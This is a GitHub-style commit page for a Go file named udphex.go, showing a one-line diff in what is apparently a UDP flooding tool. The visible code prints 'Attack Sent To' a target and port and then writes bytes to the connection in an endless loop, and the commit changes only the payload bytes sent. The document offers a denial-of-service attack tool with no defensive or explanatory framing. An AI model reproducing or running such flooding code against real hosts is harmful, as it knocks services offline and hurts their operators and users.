Update udphex.go

This commit is contained in:
Fijxu 2021-10-12 12:29:24 -03:00 committed by GitHub
parent a2e09b06db
commit 1d54bc962d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -15,7 +15,7 @@ func main() {
} else {
fmt.Println("Attack Sent To " + target + ":" + port)
for {
conn.Write([]byte("\x61\x73\x64"))
conn.Write([]byte("\x31"))
}
}
}